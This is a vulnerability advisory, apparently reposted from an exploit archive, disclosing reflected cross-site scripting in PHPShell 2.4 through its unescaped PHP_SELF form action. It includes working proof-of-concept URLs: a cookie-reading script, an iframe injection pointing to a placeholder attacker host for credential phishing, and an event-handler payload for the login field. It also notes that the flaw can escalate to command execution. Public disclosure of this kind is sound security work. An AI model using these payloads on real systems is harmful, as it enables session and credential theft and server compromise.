PHPShell version 2.4 suffers from a cross site scripting vulnerability.
[+] Credits: John Page AKA hyp3rlinx [+] Website: hyp3rlinx.altervista.org Vendor: ========== sourceforge.net/projects/phpshell/ phpshell.sourceforge.net/ Product: ============= PHPShell v2.4 Vulnerability Type: ==================== Cross Site Scripting CVE Reference: ============== N/A Security Issue: ================ Multiple cross site scripting entry points exist in PHPShell undermining the integrity between users browser and server. Allowing remote attackers to bypass access controls such as the same-origin policy. If an authenticated user clicks an attacker supplied link. XSS issue is made possible because PHPShell calls print $_SERVER['PHP_SELF'] on the main HTML form. Since PHP_SELF references URL, PHPShell simply reads our XSS payload in the URL and echoes it back to client. <form name="shell" enctype="multipart/form-data" action="<?php print($_SERVER['PHP_SELF']) ?>" method="post"> Since PHPShell purpose is to execute system commands this XSS vulnerability can potentially become a 'Remote Command Execution' vulnerability. Moreover, this XSS issue can also potentially leverage a Session Fixation vulnerability also present in PHPShell. Reference: " http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-SESSION-FIXATION.txt " Tested successfully in Firefox Exploit/POC: ============= XSS 1) http://VICTIM-IP/phpshell-2.4/phpshell.php/%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E OR Inject IFRAME to phish and steal credentials, you get the idea. http://VICTIM-IP/phpshell-2.4/phpshell.php/%22/%3E%3Cscript%3Evar%20frm=document.createElement('IFRAME');document.body.appendChild(frm);frm.setAttribute(%22width%22,%22900%22);frm.setAttribute(%22height%22,%22900%22);frm.src=%22http://ATTACKER-IP.com%22%3C/script%3E%3C!-- XSS 2) http://VICTIM-IP/phpshell-2.4/phpshell.php On the Login Authentication HTML form 'username' input field " onMousemove="alert(document.cookie) enter a password and hit Enter. # 0day.today [2018-04-09] #